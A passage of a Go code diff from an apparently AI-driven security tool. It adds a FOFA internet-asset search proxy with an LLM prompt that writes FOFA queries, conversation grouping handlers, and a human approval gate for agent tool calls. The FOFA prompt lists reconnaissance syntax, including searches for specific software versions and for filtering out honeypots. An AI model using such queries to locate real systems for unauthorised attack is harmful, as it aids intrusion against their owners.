ParseNaturalLanguage(c *gin.Context) { + var req fofaParseRequest + if err := c.ShouldBindJSON(&req); err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": "无效的请求参数: " + err.Error()}) + return + } + req.Text = strings.TrimSpace(req.Text) + if req.Text == "" { + c.JSON(http.StatusBadRequest, gin.H{"error": "text 不能为空"}) + return + } + + if h.cfg == nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": "系统配置未初始化"}) + return + } + if strings.TrimSpace(h.cfg.OpenAI.APIKey) == "" || strings.TrimSpace(h.cfg.OpenAI.Model) == "" { + c.JSON(http.StatusBadRequest, gin.H{ + "error": "未配置 AI 模型:请在系统设置中填写 openai.api_key 与 openai.model(支持 OpenAI 兼容 API,如 DeepSeek)", + "need": []string{"openai.api_key", "openai.model"}, + }) + return + } + if h.openAIClient == nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": "AI 客户端未初始化"}) + return + } + + systemPrompt := strings.TrimSpace(` +你是“FOFA 查询语法生成器”。任务:把用户输入的自然语言搜索意图,转换成 FOFA 查询语法。 + +输出要求(非常重要): +1) 只输出 JSON(不要 markdown、不要代码块、不要额外解释文本) +2) JSON 结构必须是: +{ + "query": "string,FOFA查询语法(可直接粘贴到 FOFA 或本系统查询框)", + "explanation": "string,可选,解释你如何映射字段/逻辑", + "warnings": ["string"...] 可选,列出歧义/风险/需要人工确认的点 +} +3) 如果用户输入本身已经是 FOFA 查询语法(或非常接近 FOFA 语法的表达式),应当“原样返回”为 query: + - 不要擅自改写字段名、操作符、括号结构 + - 不要改写任何字符串值(尤其是地理位置类值),不要做缩写/同义词替换/翻译/音译 + +查询语法要点(来自 FOFA 语法参考): +- 逻辑连接符:&&(与)、||(或),必要时用 () 包住子表达式以确认优先级(括号优先级最高) +- 当同一层级同时出现 && 与 ||(混用)时,用 () 明确优先级(避免歧义) +- 比较/匹配: + - = 匹配;当字段="" 时,可查询“不存在该字段”或“值为空”的情况 + - == 完全匹配;当字段=="" 时,可查询“字段存在且值为空”的情况 + - != 不匹配;当字段!="" 时,可查询“值不为空”的情况 + - *= 模糊匹配;可使用 * 或 ? 进行搜索 +- 直接输入关键词(不带字段)会在标题、HTML内容、HTTP头、URL字段中搜索;但当意图明确时优先用字段表达(更可控、更准确) + +字段示例速查(来自用户提供的案例,可直接套用/拼接): +- 高级搜索操作符示例: + - title="beijing" (= 匹配) + - title=="" (== 完全匹配,字段存在且值为空) + - title="" (= 匹配,可能表示字段不存在或值为空) + - title!="" (!= 不匹配,可用于值不为空) + - title*="*Home*" (*= 模糊匹配,用 * 或 ?) + - (app="Apache" || app="Nginx") && country="CN" (混用 && / || 时用括号) +- 基础类(General): + - ip="1.1.1.1" + - ip="220.181.111.1/24" + - ip="2600:9000:202a:2600:18:4ab7:f600:93a1" + - port="6379" + - domain="qq.com" + - host=".fofa.info" + - os="centos" + - server="Microsoft-IIS/10" + - asn="19551" + - org="LLC Baxet" + - is_domain=true / is_domain=false + - is_ipv6=true / is_ipv6=false +- 标记类(Special Label): + - app="Microsoft-Exchange" + - fid="sSXXGNUO2FefBTcCLIT/2Q==" + - product="NGINX" + - product="Roundcube-Webmail" && product.version="1.6.10" + - category="服务" + - type="service" / type="subdomain" + - cloud_name="Aliyundun" + - is_cloud=true / is_cloud=false + - is_fraud=true / is_fraud=false + - is_honeypot=true / is_honeypot=false +- 协议类(type=service): + - protocol="quic" + - banner="users" + - banner_hash="7330105010150477363" + - banner_fid="zRpqmn0FXQRjZpH8MjMX55zpMy9SgsW8" + - base_protocol="udp" / base_protocol="tcp" +- 网站类(type=subdomain): + - title="beijing" + - header="elastic" + - header_hash="1258854265" + - body="网络空间测绘" + - body_hash="-2090962452" + - js_name="js/jquery.js" + - js_md5="82ac3f14327a8b7ba49baa208d4eaa15" + - cname="customers.spektrix.com" + - cname_domain="siteforce.com" + - icon_hash="-247388890" + - status_code="402" + - icp="京ICP证030173号" + - sdk_hash="Are3qNnP2Eqn7q5kAoUO3l+w3mgVIytO" +- 地理位置(Location): + - country="CN" 或 country="中国" + - region="Zhejiang" 或 region="浙江"(仅支持中国地区中文) + - city="Hangzhou" +- 证书类(Certificate): + - cert="baidu" + - cert.subject="Oracle Corporation" + - cert.issuer="DigiCert" + - cert.subject.org="Oracle Corporation" + - cert.subject.cn="baidu.com" + - cert.issuer.org="cPanel, Inc." + - cert.issuer.cn="Synology Inc. CA" + - cert.domain="huawei.com" + - cert.is_equal=true / cert.is_equal=false + - cert.is_valid=true / cert.is_valid=false + - cert.is_match=true / cert.is_match=false + - cert.is_expired=true / cert.is_expired=false + - jarm="2ad2ad0002ad2ad22c2ad2ad2ad2ad2eac92ec34bcc0cf7520e97547f83e81" + - tls.version="TLS 1.3" + - tls.ja3s="15af977ce25de452b96affa2addb1036" + - cert.sn="356078156165546797850343536942784588840297" + - cert.not_after.after="2025-03-01" / cert.not_after.before="2025-03-01" + - cert.not_before.after="2025-03-01" / cert.not_before.before="2025-03-01" +- 时间类(Last update time): + - after="2023-01-01" + - before="2023-12-01" + - after="2023-01-01" && before="2023-12-01" +- 独立IP语法(需配合 ip_filter / ip_exclude): + - ip_filter(banner="SSH-2.0-OpenSSH_6.7p2") && ip_filter(icon_hash="-1057022626") + - ip_filter(banner="SSH-2.0-OpenSSH_6.7p2" && asn="3462") && ip_exclude(title="EdgeOS") + - port_size="6" / port_size_gt="6" / port_size_lt="12" + - ip_ports="80,161" + - ip_country="CN" + - ip_region="Zhejiang" + - ip_city="Hangzhou" + - ip_after="2021-03-18" + - ip_before="2019-09-09" + +生成约束与注意事项: +- 字符串值一律用英文双引号包裹,例如 title="登录"、country="CN" +- 字符串值保持字面一致:不要缩写(例如 city="beijing" 不要变成 city="BJ"),不要用别名(例如 Beijing/Peking),不要擅自翻译/音译/改写大小写 +- 地理位置字段(country/region/city)更倾向于“按用户给定值输出”;不确定合法取值时,不要猜测,把备选写进 warnings +- 不要捏造不存在的 FOFA 字段;不确定时把不确定点写进 warnings,并输出一个保守的 query +- 当用户描述里有“多个与/或条件”,优先加 () 明确优先级,例如:(app="Apache" || app="Nginx") && country="CN" +- 当用户缺少关键条件导致范围过大或歧义(如地点/协议/端口/服务类型未说明),允许 query 为空字符串,并在 warnings 里明确需要补充的信息 +`) + + userPrompt := fmt.Sprintf("自然语言意图:%s", req.Text) + + requestBody := map[string]interface{}{ + "model": h.cfg.OpenAI.Model, + "messages": []map[string]interface{}{ + {"role": "system", "content": systemPrompt}, + {"role": "user", "content": userPrompt}, + }, + "temperature": 0.1, + "max_completion_tokens": 12000, + } + + // OpenAI 返回结构:只需要 choices[0].message.content + var apiResponse struct { + Choices []struct { + Message struct { + Content string `json:"content"` + } `json:"message"` + } `json:"choices"` + } + + ctx, cancel := context.WithTimeout(c.Request.Context(), 90*time.Second) + defer cancel() + + if err := h.openAIClient.ChatCompletion(ctx, requestBody, &apiResponse); err != nil { + var apiErr *openaiClient.APIError + if errors.As(err, &apiErr) { + h.logger.Warn("FOFA自然语言解析:LLM返回错误", zap.Int("status", apiErr.StatusCode)) + c.JSON(http.StatusBadGateway, gin.H{"error": "AI 解析失败(上游返回非 200),请检查模型配置或稍后重试"}) + return + } + c.JSON(http.StatusBadGateway, gin.H{"error": "AI 解析失败: " + err.Error()}) + return + } + if len(apiResponse.Choices) == 0 { + c.JSON(http.StatusBadGateway, gin.H{"error": "AI 未返回有效结果"}) + return + } + + content := strings.TrimSpace(apiResponse.Choices[0].Message.Content) + // 兼容模型偶尔返回 ```json ... ``` 的情况 + content = strings.TrimPrefix(content, "```json") + content = strings.TrimPrefix(content, "```") + content = strings.TrimSuffix(content, "```") + content = strings.TrimSpace(content) + + var parsed fofaParseResponse + if err := json.Unmarshal([]byte(content), &parsed); err != nil { + // 直接回传一部分原文,方便排查,但避免太大 + snippet := content + if len(snippet) > 1200 { + snippet = snippet[:1200] + } + c.JSON(http.StatusBadGateway, gin.H{ + "error": "AI 返回内容无法解析为 JSON,请稍后重试或换个描述方式", + "snippet": snippet, + }) + return + } + parsed.Query = strings.TrimSpace(parsed.Query) + if parsed.Query == "" { + // query 允许为空(表示需求不明确),但前端需要明确提示 + if len(parsed.Warnings) == 0 { + parsed.Warnings = []string{"需求信息不足,未能生成可用的 FOFA 查询语法,请补充关键条件(如国家/端口/产品/域名等)。"} + } + } + + c.JSON(http.StatusOK, parsed) +} + +// Search FOFA 查询(后端代理,避免前端暴露 key) +func (h *FofaHandler) Search(c *gin.Context) { + var req fofaSearchRequest + if err := c.ShouldBindJSON(&req); err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": "无效的请求参数: " + err.Error()}) + return + } + + req.Query = strings.TrimSpace(req.Query) + if req.Query == "" { + c.JSON(http.StatusBadRequest, gin.H{"error": "query 不能为空"}) + return + } + if req.Size <= 0 { + req.Size = 100 + } + if req.Page <= 0 { + req.Page = 1 + } + // FOFA 接口 size 上限和账户权限相关,这里只做一个合理的保护 + if req.Size > 10000 { + req.Size = 10000 + } + if req.Fields == "" { + req.Fields = "host,ip,port,domain,title,protocol,country,province,city,server" + } + + email, apiKey := h.resolveCredentials() + if email == "" || apiKey == "" { + c.JSON(http.StatusBadRequest, gin.H{ + "error": "FOFA 未配置:请在系统设置中填写 FOFA Email/API Key,或设置环境变量 FOFA_EMAIL/FOFA_API_KEY", + "need": []string{"fofa.email", "fofa.api_key"}, + "env_key": []string{"FOFA_EMAIL", "FOFA_API_KEY"}, + }) + return + } + + baseURL := h.resolveBaseURL() + qb64 := base64.StdEncoding.EncodeToString([]byte(req.Query)) + + u, err := url.Parse(baseURL) + if err != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": "FOFA base_url 无效: " + err.Error()}) + return + } + + params := u.Query() + params.Set("email", email) + params.Set("key", apiKey) + params.Set("qbase64", qb64) + params.Set("size", fmt.Sprintf("%d", req.Size)) + params.Set("page", fmt.Sprintf("%d", req.Page)) + params.Set("fields", strings.TrimSpace(req.Fields)) + if req.Full { + params.Set("full", "true") + } else { + // 明确传 false,便于排查 + params.Set("full", "false") + } + u.RawQuery = params.Encode() + + httpReq, err := http.NewRequestWithContext(c.Request.Context(), http.MethodGet, u.String(), nil) + if err != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": "创建请求失败: " + err.Error()}) + return + } + + resp, err := h.client.Do(httpReq) + if err != nil { + c.JSON(http.StatusBadGateway, gin.H{"error": "请求 FOFA 失败: " + err.Error()}) + return + } + defer resp.Body.Close() + + if resp.StatusCode < 200 || resp.StatusCode >= 300 { + c.JSON(http.StatusBadGateway, gin.H{"error": fmt.Sprintf("FOFA 返回非 2xx: %d", resp.StatusCode)}) + return + } + + var apiResp fofaAPIResponse + if err := json.NewDecoder(resp.Body).Decode(&apiResp); err != nil { + c.JSON(http.StatusBadGateway, gin.H{"error": "解析 FOFA 响应失败: " + err.Error()}) + return + } + if apiResp.Error { + msg := strings.TrimSpace(apiResp.ErrMsg) + if msg == "" { + msg = "FOFA 返回错误" + } + c.JSON(http.StatusBadGateway, gin.H{"error": msg}) + return + } + + fields := splitAndCleanCSV(req.Fields) + results := make([]map[string]interface{}, 0, len(apiResp.Results)) + for _, row := range apiResp.Results { + item := make(map[string]interface{}, len(fields)) + for i, f := range fields { + if i < len(row) { + item[f] = row[i] + } else { + item[f] = nil + } + } + results = append(results, item) + } + + c.JSON(http.StatusOK, fofaSearchResponse{ + Query: req.Query, + Size: apiResp.Size, + Page: apiResp.Page, + Total: apiResp.Total, + Fields: fields, + ResultsCount: len(results), + Results: results, + }) +} + +func splitAndCleanCSV(s string) []string { + parts := strings.Split(s, ",") + out := make([]string, 0, len(parts)) + seen := make(map[string]struct{}, len(parts)) + for _, p := range parts { + v := strings.TrimSpace(p) + if v == "" { + continue + } + if _, ok := seen[v]; ok { + continue + } + seen[v] = struct{}{} + out = append(out, v) + } + return out +} diff --git a/internal/handler/group.go b/internal/handler/group.go new file mode 100644 index 00000000..495e7695 --- /dev/null +++ b/internal/handler/group.go @@ -0,0 +1,320 @@ +package handler + +import ( + "net/http" + "time" + + "cyberstrike-ai/internal/database" + + "github.com/gin-gonic/gin" + "go.uber.org/zap" +) + +// GroupHandler 分组处理器 +type GroupHandler struct { + db *database.DB + logger *zap.Logger +} + +// NewGroupHandler 创建新的分组处理器 +func NewGroupHandler(db *database.DB, logger *zap.Logger) *GroupHandler { + return &GroupHandler{ + db: db, + logger: logger, + } +} + +// CreateGroupRequest 创建分组请求 +type CreateGroupRequest struct { + Name string `json:"name"` + Icon string `json:"icon"` +} + +// CreateGroup 创建分组 +func (h *GroupHandler) CreateGroup(c *gin.Context) { + var req CreateGroupRequest + if err := c.ShouldBindJSON(&req); err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()}) + return + } + + if req.Name == "" { + c.JSON(http.StatusBadRequest, gin.H{"error": "分组名称不能为空"}) + return + } + + group, err := h.db.CreateGroup(req.Name, req.Icon) + if err != nil { + h.logger.Error("创建分组失败", zap.Error(err)) + // 如果是名称重复错误,返回400状态码 + if err.Error() == "分组名称已存在" { + c.JSON(http.StatusBadRequest, gin.H{"error": "分组名称已存在"}) + return + } + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + + c.JSON(http.StatusOK, group) +} + +// ListGroups 列出所有分组 +func (h *GroupHandler) ListGroups(c *gin.Context) { + groups, err := h.db.ListGroups() + if err != nil { + h.logger.Error("获取分组列表失败", zap.Error(err)) + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + + c.JSON(http.StatusOK, groups) +} + +// GetGroup 获取分组 +func (h *GroupHandler) GetGroup(c *gin.Context) { + id := c.Param("id") + + group, err := h.db.GetGroup(id) + if err != nil { + h.logger.Error("获取分组失败", zap.Error(err)) + c.JSON(http.StatusNotFound, gin.H{"error": "分组不存在"}) + return + } + + c.JSON(http.StatusOK, group) +} + +// UpdateGroupRequest 更新分组请求 +type UpdateGroupRequest struct { + Name string `json:"name"` + Icon string `json:"icon"` +} + +// UpdateGroup 更新分组 +func (h *GroupHandler) UpdateGroup(c *gin.Context) { + id := c.Param("id") + + var req UpdateGroupRequest + if err := c.ShouldBindJSON(&req); err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()}) + return + } + + if req.Name == "" { + c.JSON(http.StatusBadRequest, gin.H{"error": "分组名称不能为空"}) + return + } + + if err := h.db.UpdateGroup(id, req.Name, req.Icon); err != nil { + h.logger.Error("更新分组失败", zap.Error(err)) + // 如果是名称重复错误,返回400状态码 + if err.Error() == "分组名称已存在" { + c.JSON(http.StatusBadRequest, gin.H{"error": "分组名称已存在"}) + return + } + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + + group, err := h.db.GetGroup(id) + if err != nil { + h.logger.Error("获取更新后的分组失败", zap.Error(err)) + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + + c.JSON(http.StatusOK, group) +} + +// DeleteGroup 删除分组 +func (h *GroupHandler) DeleteGroup(c *gin.Context) { + id := c.Param("id") + + if err := h.db.DeleteGroup(id); err != nil { + h.logger.Error("删除分组失败", zap.Error(err)) + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + + c.JSON(http.StatusOK, gin.H{"message": "删除成功"}) +} + +// AddConversationToGroupRequest 添加对话到分组请求 +type AddConversationToGroupRequest struct { + ConversationID string `json:"conversationId"` + GroupID string `json:"groupId"` +} + +// AddConversationToGroup 将对话添加到分组 +func (h *GroupHandler) AddConversationToGroup(c *gin.Context) { + var req AddConversationToGroupRequest + if err := c.ShouldBindJSON(&req); err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()}) + return + } + + if err := h.db.AddConversationToGroup(req.ConversationID, req.GroupID); err != nil { + h.logger.Error("添加对话到分组失败", zap.Error(err)) + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + + c.JSON(http.StatusOK, gin.H{"message": "添加成功"}) +} + +// RemoveConversationFromGroup 从分组中移除对话 +func (h *GroupHandler) RemoveConversationFromGroup(c *gin.Context) { + conversationID := c.Param("conversationId") + groupID := c.Param("id") + + if err := h.db.RemoveConversationFromGroup(conversationID, groupID); err != nil { + h.logger.Error("从分组中移除对话失败", zap.Error(err)) + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + + c.JSON(http.StatusOK, gin.H{"message": "移除成功"}) +} + +// GroupConversation 分组对话响应结构 +type GroupConversation struct { + ID string `json:"id"` + Title string `json:"title"` + Pinned bool `json:"pinned"` + GroupPinned bool `json:"groupPinned"` + CreatedAt time.Time `json:"createdAt"` + UpdatedAt time.Time `json:"updatedAt"` +} + +// GetGroupConversations 获取分组中的所有对话 +func (h *GroupHandler) GetGroupConversations(c *gin.Context) { + groupID := c.Param("id") + searchQuery := c.Query("search") // 获取搜索参数 + + var conversations []*database.Conversation + var err error + + // 如果有搜索关键词,使用搜索方法;否则使用普通方法 + if searchQuery != "" { + conversations, err = h.db.SearchConversationsByGroup(groupID, searchQuery) + } else { + conversations, err = h.db.GetConversationsByGroup(groupID) + } + + if err != nil { + h.logger.Error("获取分组对话失败", zap.Error(err)) + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + + // 获取每个对话在分组中的置顶状态 + groupConvs := make([]GroupConversation, 0, len(conversations)) + for _, conv := range conversations { + // 查询分组内置顶状态 + var groupPinned int + err := h.db.QueryRow( + "SELECT COALESCE(pinned, 0) FROM conversation_group_mappings WHERE conversation_id = ? AND group_id = ?", + conv.ID, groupID, + ).Scan(&groupPinned) + if err != nil { + h.logger.Warn("查询分组内置顶状态失败", zap.String("conversationId", conv.ID), zap.Error(err)) + groupPinned = 0 + } + + groupConvs = append(groupConvs, GroupConversation{ + ID: conv.ID, + Title: conv.Title, + Pinned: conv.Pinned, + GroupPinned: groupPinned != 0, + CreatedAt: conv.CreatedAt, + UpdatedAt: conv.UpdatedAt, + }) + } + + c.JSON(http.StatusOK, groupConvs) +} + +// GetAllMappings 批量获取所有分组映射(消除前端 N+1 请求) +func (h *GroupHandler) GetAllMappings(c *gin.Context) { + mappings, err := h.db.GetAllGroupMappings() + if err != nil { + h.logger.Error("获取分组映射失败", zap.Error(err)) + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + + c.JSON(http.StatusOK, mappings) +} + +// UpdateConversationPinnedRequest 更新对话置顶状态请求 +type UpdateConversationPinnedRequest struct { + Pinned bool `json:"pinned"` +} + +// UpdateConversationPinned 更新对话置顶状态 +func (h *GroupHandler) UpdateConversationPinned(c *gin.Context) { + conversationID := c.Param("id") + + var req UpdateConversationPinnedRequest + if err := c.ShouldBindJSON(&req); err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()}) + return + } + + if err := h.db.UpdateConversationPinned(conversationID, req.Pinned); err != nil { + h.logger.Error("更新对话置顶状态失败", zap.Error(err)) + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + + c.JSON(http.StatusOK, gin.H{"message": "更新成功"}) +} + +// UpdateGroupPinnedRequest 更新分组置顶状态请求 +type UpdateGroupPinnedRequest struct { + Pinned bool `json:"pinned"` +} + +// UpdateGroupPinned 更新分组置顶状态 +func (h *GroupHandler) UpdateGroupPinned(c *gin.Context) { + groupID := c.Param("id") + + var req UpdateGroupPinnedRequest + if err := c.ShouldBindJSON(&req); err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()}) + return + } + + if err := h.db.UpdateGroupPinned(groupID, req.Pinned); err != nil { + h.logger.Error("更新分组置顶状态失败", zap.Error(err)) + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + + c.JSON(http.StatusOK, gin.H{"message": "更新成功"}) +} + +// UpdateConversationPinnedInGroupRequest 更新分组对话置顶状态请求 +type UpdateConversationPinnedInGroupRequest struct { + Pinned bool `json:"pinned"` +} + +// UpdateConversationPinnedInGroup 更新对话在分组中的置顶状态 +func (h *GroupHandler) UpdateConversationPinnedInGroup(c *gin.Context) { + groupID := c.Param("id") + conversationID := c.Param("conversationId") + + var req UpdateConversationPinnedInGroupRequest + if err := c.ShouldBindJSON(&req); err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()}) + return + } + + if err := h.db.UpdateConversationPinnedInGroup(conversationID, groupID, req.Pinned); err != nil { + h.logger.Error("更新分组对话置顶状态失败", zap.Error(err)) + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + + c.JSON(http.StatusOK, gin.H{"message": "更新成功"}) +} diff --git a/internal/handler/hitl.go b/internal/handler/hitl.go new file mode 100644 index 00000000..a6759639 --- /dev/null +++ b/internal/handler/hitl.go @@ -0,0 +1,792 @@ +package handler + +import ( + "context" + "database/sql" + "encoding/json" + "errors" + "math" + "net/http" + "strconv" + "strings" + "sync" + "time" + + "cyberstrike-ai/internal/database" + "cyberstrike-ai/internal/multiagent" + + "github.com/gin-gonic/gin" + "github.com/google/uuid" + "go.uber.org/zap" +) + +type hitlRuntimeConfig struct { + Enabled bool + Mode string + SensitiveTools map[string]struct{} + Timeout time.Duration +} + +type hitlDecision struct { + Decision string + Comment string + EditedArguments map[string]interface{} +} + +type pendingInterrupt struct { + ConversationID string + InterruptID string + Mode string + ToolName string + ToolCallID string + decideCh chan hitlDecision +} + +type HITLManager struct { + db *database.DB + logger *zap.Logger + + mu sync.RWMutex + runtime map[string]hitlRuntimeConfig + pending map[string]*pendingInterrupt +} + +func NewHITLManager(db *database.DB, logger *zap.Logger) *HITLManager { + return &HITLManager{ + db: db, + logger: logger, + runtime: make(map[string]hitlRuntimeConfig), + pending: make(map[string]*pendingInterrupt), + } +} + +func (m *HITLManager) EnsureSchema() error { + if _, err := m.db.Exec(` +CREATE TABLE IF NOT EXISTS hitl_interrupts ( + id TEXT PRIMARY KEY, + conversation_id TEXT NOT NULL, + message_id TEXT, + mode TEXT NOT NULL, + tool_name TEXT NOT NULL, + tool_call_id TEXT, + payload TEXT, + status TEXT NOT NULL, + decision TEXT, + decision_comment TEXT, + created_at DATETIME NOT NULL, + decided_at DATETIME +);`); err != nil { + return err + } + _, err := m.db.Exec(` +CREATE TABLE IF NOT EXISTS hitl_conversation_configs ( + conversation_id TEXT PRIMARY KEY, + enabled INTEGER NOT NULL DEFAULT 0, + mode TEXT NOT NULL DEFAULT 'off', + sensitive_tools TEXT NOT NULL DEFAULT '[]', + timeout_seconds INTEGER NOT NULL DEFAULT 0, + updated_at DATETIME NOT NULL +);`) + if err != nil { + return err + } + + // On startup, cancel all orphaned pending interrupts from previous process. + // Their in-memory channels are gone, so they can never be resolved. + res, err := m.db.Exec(`UPDATE hitl_interrupts SET status='cancelled', decision='reject', + decision_comment='process restarted', decided_at=CURRENT_TIMESTAMP WHERE status='pending'`) + if err != nil { + m.logger.Warn("failed to cancel orphaned HITL interrupts", zap.Error(err)) + } else if n, _ := res.RowsAffected(); n > 0 { + m.logger.Info("cancelled orphaned HITL interrupts from previous process", zap.Int64("count", n)) + } + return nil +} + +func normalizeHitlMode(mode string) string { + v := strings.ToLower(strings.TrimSpace(mode)) + if v == "" { + return "approval" + } + switch v { + case "off": + return "off" + case "feedback", "followup": + return "approval" + case "approval", "review_edit": + return v + default: + return "approval" + } +} + +func (m *HITLManager) ActivateConversation(conversationID string, req *HITLRequest) { + if req == nil || !req.Enabled { + m.DeactivateConversation(conversationID) + return + } + tools := make(map[string]struct{}) + for _, t := range req.SensitiveTools { + n := strings.ToLower(strings.TrimSpace(t)) + if n != "" { + tools[n] = struct{}{} + } + } + // timeout <= 0 means wait forever (no timeout). + timeout := time.Duration(0) + if req.TimeoutSeconds > 0 { + timeout = time.Duration(req.TimeoutSeconds) * time.Second + } + m.mu.Lock() + m.runtime[conversationID] = hitlRuntimeConfig{ + Enabled: true, + Mode: normalizeHitlMode(req.Mode), + SensitiveTools: tools, + Timeout: timeout, + } + m.mu.Unlock() +} + +func (m *HITLManager) DeactivateConversation(conversationID string) { + m.mu.Lock() + delete(m.runtime, conversationID) + m.mu.Unlock() +} + +// hitlConfigGlobalToolWhitelist 来自 config.yaml hitl.tool_whitelist(去重、去空)。 +func (h *AgentHandler) hitlConfigGlobalToolWhitelist() []string { + if h == nil || h.config == nil { + return nil + } + raw := h.config.Hitl.ToolWhitelist + if len(raw) == 0 { + return nil + } + seen := make(map[string]struct{}) + out := make([]string, 0, len(raw)) + for _, t := range raw { + n := strings.ToLower(strings.TrimSpace(t)) + if n == "" { + continue + } + if _, ok := seen[n]; ok { + continue + } + seen[n] = struct{}{} + out = append(out, strings.TrimSpace(t)) + } + return out +} + +// hitlRequestWithMergedConfigWhitelist 将会话/API 中的白名单与 config.yaml 全局白名单合并(并集),仅用于运行时 Activate;不写入数据库。 +func (h *AgentHandler) hitlRequestWithMergedConfigWhitelist(req *HITLRequest) *HITLRequest { + gw := h.hitlConfigGlobalToolWhitelist() + if len(gw) == 0 { + return req + } + if req == nil { + return nil + } + seen := make(map[string]struct{}) + union := make([]string, 0, len(gw)+len(req.SensitiveTools)) + for _, t := range gw { + n := strings.ToLower(strings.TrimSpace(t)) + if n == "" { + continue + } + if _, ok := seen[n]; ok { + continue + } + seen[n] = struct{}{} + union = append(union, strings.TrimSpace(t)) + } + for _, t := range req.SensitiveTools { + n := strings.ToLower(strings.TrimSpace(t)) + if n == "" { + continue + } + if _, ok := seen[n]; ok { + continue + } + seen[n] = struct{}{} + union = append(union, strings.TrimSpace(t)) + } + out := *req + out.SensitiveTools = union + return &out +} + +func (m *HITLManager) shouldInterrupt(conversationID, toolName string) (hitlRuntimeConfig, bool) { + m.mu.RLock() + cfg, ok := m.runtime[conversationID] + m.mu.RUnlock() + if !ok || !cfg.Enabled { + return hitlRuntimeConfig{}, false + } + // 语义:SensitiveTools 现在作为“白名单(免审批工具)” + // 空白名单 => 全部工具都需要审批 + if len(cfg.SensitiveTools) == 0 { + return cfg, true + } + _, inWhitelist := cfg.SensitiveTools[strings.ToLower(strings.TrimSpace(toolName))] + return cfg, !inWhitelist +} + +// NeedsToolApproval 与 Agent 工具层 shouldInterrupt 语义一致:仅当该会话已开启人机协同且工具不在免审批白名单时为 true。 +func (m *HITLManager) NeedsToolApproval(conversationID, toolName string) bool { + if m == nil { + return false + } + _, need := m.shouldInterrupt(conversationID, toolName) + return need +} + +func (m *HITLManager) CreatePendingInterrupt(conversationID, assistantMessageID, mode, toolName, toolCallID, payload string) (*pendingInterrupt, error) { + now := time.Now() + id := "hitl_" + strings.ReplaceAll(uuid.New().String(), "-", "") + if _, err := m.db.Exec(`INSERT INTO hitl_interrupts + (id, conversation_id, message_id, mode, tool_name, tool_call_id, payload, status, created_at) + VALUES (?, ?, ?, ?, ?, ?, ?, 'pending', ?)`, + id, conversationID, assistantMessageID, mode, toolName, toolCallID, payload, now); err != nil { + return nil, err + } + // 刷新页面后侧栏依赖 DB 配置;若仅内存 Activate 未落库,会导致「有待审批却显示关闭」 + _ = m.ensureConversationHITLModePersisted(conversationID, mode) + p := &pendingInterrupt{ + ConversationID: conversationID, + InterruptID: id, + Mode: normalizeHitlMode(mode), + ToolName: toolName, + ToolCallID: toolCallID, + decideCh: make(chan hitlDecision, 1), + } + m.mu.Lock() + m.pending[id] = p + m.mu.Unlock() + return p, nil +} + +// ensureConversationHITLModePersisted 在产生待审批时把 mode 写入 hitl_conversation_configs,避免刷新后 GET 配置仍为关闭。 +func (m *HITLManager) ensureConversationHITLModePersisted(conversationID, interruptMode string) error { + if strings.TrimSpace(conversationID) == "" { + return nil + } + nm := normalizeHitlMode(interruptMode) + if nm == "off" { + return nil + } + cfg, err := m.LoadConversationConfig(conversationID) + if err != nil { + return err + } + if cfg.Enabled && normalizeHitlMode(cfg.Mode) == nm { + return nil + } + cfg.Enabled = true + cfg.Mode = nm + if cfg.TimeoutSeconds < 0 { + cfg.TimeoutSeconds = 0 + } + return m.SaveConversationConfig(conversationID, cfg) +} + +// PendingHITLInterruptMode 返回该会话最新一条 pending 中断的协同模式(用于 GET 配置时与库内「关闭」状态对齐)。 +func (m *HITLManager) PendingHITLInterruptMode(conversationID string) (string, bool) { + if strings.TrimSpace(conversationID) == "" { + return "", false + } + var mode string + err := m.db.QueryRow(`SELECT mode FROM hitl_interrupts WHERE conversation_id = ? AND status = 'pending' ORDER BY created_at DESC LIMIT 1`, conversationID). + Scan(&mode) + if err != nil { + if errors.Is(err, sql.ErrNoRows) { + return "", false + } + return "", false + } + mode = strings.TrimSpace(mode) + if mode == "" { + return "", false + } + return mode, true +} + +func hitlStoredConfigEffective(cfg *HITLRequest) bool { + if cfg == nil { + return false + } + if cfg.Enabled { + return true + } + return normalizeHitlMode(cfg.Mode) != "off" +} + +func (m *HITLManager) ResolveInterrupt(interruptID, decision, comment string, editedArguments map[string]interface{}) error { + decision = strings.ToLower(strings.TrimSpace(decision)) + if decision != "approve" && decision != "reject" { + return errors.New("decision must be approve/reject") + } + m.mu.RLock() + p, ok := m.pending[interruptID] + m.mu.RUnlock() + if !ok { + return errors.New("interrupt not found or already resolved") + } + d := hitlDecision{ + Decision: decision, + Comment: strings.TrimSpace(comment), + EditedArguments: editedArguments, + } + select { + case p.decideCh <- d: + return nil + default: + return errors.New("interrupt already resolved or decision channel busy") + } +} + +func (m *HITLManager) SaveConversationConfig(conversationID string, req *HITLRequest) error { + if strings.TrimSpace(conversationID) == "" { + return errors.New("conversationId is required") + } + if req == nil { + req = &HITLRequest{Enabled: false, Mode: "off", TimeoutSeconds: 0} + } + mode := normalizeHitlMode(req.Mode) + if !req.Enabled { + mode = "off" + } + tools, _ := json.Marshal(req.SensitiveTools) + timeout := req.TimeoutSeconds + if timeout < 0 { + timeout = 0 + } + _, err := 